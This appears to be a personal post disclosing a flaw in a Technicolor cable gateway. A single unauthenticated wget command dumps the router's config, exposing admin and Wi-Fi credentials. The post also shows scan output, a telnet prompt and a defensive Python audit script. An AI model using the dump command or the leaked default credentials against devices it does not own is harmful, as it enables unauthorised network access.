Just do a
wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | strings
and receive
8021 !UPC1386571 * + SKKMRPXP 27354285 Broadcom Broadcom TechnicolorAP 123456 #0x000102030405060708090A0B0C0D0EBB 0000001 CDP. RG.. admin Technicolor clock.via.net ntp.nasa.gov tick.ucla.edu FIRE T802 UPC1386571 2.4G UPC0118016 SKKMRPXP EZXRXZZE THOMSON THOMSON SKKMRPXP THOMSON THOMSON THOMSON UPC. <Admin MLog admin admin
The last two lines are the admin login (user admin, password admin). I leave them set to their default config, because it does not increase security to change them...
The wireless name is UPC1386571 and the password SKKMRPXP:
Cell 08 - Address: 8C:04:FF:*:*:*
          Channel:11
          Frequency:2.462 GHz (Channel 11)
          Quality=54/70 Signal level=-56 dBm
          Encryption key:on
          ESSID:"UPC1386571"
          Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                    24 Mb/s; 36 Mb/s; 54 Mb/s
          Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
          Mode:Master
          Extra:tsf=00000008198c21d5
          Extra: Last beacon: 220ms ago
          IE: IEEE 802.11i/WPA2 Version 1
              Group Cipher : TKIP
              Pairwise Ciphers (2) : CCMP TKIP
              Authentication Suites (1) : PSK
          IE: WPA Version 1
              Group Cipher : TKIP
              Pairwise Ciphers (2) : CCMP TKIP
              Authentication Suites (1) : PSK
There is no way to disable wireless (or edit the password) because I am greeted with the error message
The connection to the server was reset while the page was loading.
if I try to access the "Wireless" settings tab in the web UI. It is not possible to edit the dumped config file and write it back, because this is broken in current software.
De facto, anyone who figures out the algorithm that calculates the wifi password based on... well, most probably just the MAC address or something else visible from the outside... can access my wireless network, which I never activated (btw. internet was ordered WITHOUT wifi, because they want extra money for it!). If the wifi password is truly "random", the password is still only 8 digits, only uppercase letters, of which only E S P K M R X Z were observed so far (only 8!).
It is time to wrap that device in aluminium foil...
Edit: told you so... http://derstandard.at/2000028921659/UPC-Standard-WLAN-Passwoerter-kinderleicht-zu-knacken
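A defender-side check for the exposure described above, as an added example that is not part of the original post: it parses `iwlist scan` output and flags access points that still advertise a vendor-default SSID, and goes slightly beyond the post by also flagging the legacy WPA1/TKIP settings visible in the scan. The "UPC plus 7 digits" pattern is an assumption taken from the single SSID shown here; the sample scan and its MAC addresses are constructed.

```python
import re

# Constructed sample, modelled on the `iwlist scan` output shown in the post.
SAMPLE_SCAN = """\
Cell 01 - Address: 02:00:00:00:00:01
          ESSID:"HomeNet"
          IE: IEEE 802.11i/WPA2 Version 1
              Group Cipher : CCMP
              Pairwise Ciphers (1) : CCMP
Cell 02 - Address: 02:00:00:00:00:02
          ESSID:"UPC1386571"
          IE: IEEE 802.11i/WPA2 Version 1
              Group Cipher : TKIP
              Pairwise Ciphers (2) : CCMP TKIP
          IE: WPA Version 1
              Group Cipher : TKIP
              Pairwise Ciphers (2) : CCMP TKIP
"""
# Assumption: vendor-default SSIDs look like the one in the post ("UPC" + 7 digits).
DEFAULT_SSID = re.compile(r"^UPC\d{7}$")

def parse_cells(scan_text):
    """Split iwlist output into one dict per cell: address, essid, ies, ciphers."""
    cells = []
    for line in map(str.strip, scan_text.splitlines()):
        if m := re.match(r"Cell \d+ - Address: (\S+)", line):
            cells.append({"address": m.group(1), "essid": "", "ies": [], "ciphers": set()})
        elif not cells:
            continue  # ignore anything that appears before the first cell
        elif m := re.match(r'ESSID:"(.*)"', line):
            cells[-1]["essid"] = m.group(1)
        elif line.startswith("IE: "):
            cells[-1]["ies"].append(line[4:])
        elif m := re.match(r"(?:Group Cipher|Pairwise Ciphers \(\d+\)) : (.+)", line):
            cells[-1]["ciphers"].update(m.group(1).split())
    return cells

def audit(cell):
    """Return the findings for one parsed cell (empty list: nothing flagged)."""
    checks = [
        (DEFAULT_SSID.match(cell["essid"]), "vendor-default SSID"),
        (any(ie.startswith("WPA Version") for ie in cell["ies"]), "legacy WPA1 enabled"),
        ("TKIP" in cell["ciphers"], "TKIP accepted"),
    ]
    return [msg for hit, msg in checks if hit]

if __name__ == "__main__":
    for c in parse_cells(SAMPLE_SCAN):
        print(c["address"], c["essid"], audit(c) or "ok")
```

Feeding it the output of a scan taken near your own equipment shows whether a gateway you ordered without wifi is broadcasting anyway.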
I am sure TechnicolorAP / 123456 and the other strange strings are other login credentials, maybe used for telnet (did not try this on the internet connected/KabelBW provided unit):
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'
Broadcom Corporation Embedded BFC Telnet Server (c) 2000-2008
WARNING: Access allowed by authorized users only.
Login:
Other source for CSRF vulnerabilities: https://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/